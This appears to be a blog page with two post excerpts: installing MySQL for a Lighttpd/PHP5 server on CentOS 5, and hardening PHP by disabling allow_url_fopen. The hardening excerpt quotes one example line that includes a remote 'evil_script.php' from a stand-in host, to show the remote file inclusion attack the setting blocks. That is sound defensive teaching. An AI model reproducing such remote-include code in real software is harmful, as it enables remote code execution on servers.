blog.up-link.ro android bsd linux unix & open-source world

17May/101

How To Install Lighttpd with PHP5 and MySQL support on CentOS 5

Lighttpd is an open-source web server optimized for speed-critical environments. It's standards-compliant, secure and flexible. In this tutorial I'll show you how to install Lighttpd on a CentOS 5.4 server with PHP5 support (through FastCGI) and MySQL support.

1. Installing MySQL 5 Server

To install MySQL run this command from the shell:

# yum install mysql mysql-server

Enable MySQL server on boot and start MySQL server:

# chkconfig --levels 235 mysqld on
# service mysqld start

Print This Post Print This Post
13Apr/106

PHP Security Tips – Securing PHP by hardening PHP configuration

When it comes to security, ignorance is definitely not blissful. There are several methods to increase the security of your PHP environment.

In this article I will discuss how to secure PHP by hardening PHP 5 configuration.

1. allow_url_fopen ( enabled by default )

This directive allows PHP's file functions ( file_get_contents, include and require statements ) to retrieve data from remote locations, like FTP or HTTP.

If an attacker can manipulate the arguments to those functions, they can use a URL under their control as the argument and run their own remote scripts. The vulnerability is called Remote file inclusion or RFI.

; Disable allow_url_fopen in php.ini for security reasons
allow_url_fopen = Off

The setting can also be applied in apache's httpd.conf :

# Disable allow_url_fopen for security reasons
php_admin_flag allow_url_fopen Off

It prevents URLs from being used in PHP. A command like include ("http://www.example.com/evil_script.php") will not be allowed to execute. Only files that reside within your site can be included: include("/var/www/html/config.inc.php").

Print This Post Print This Post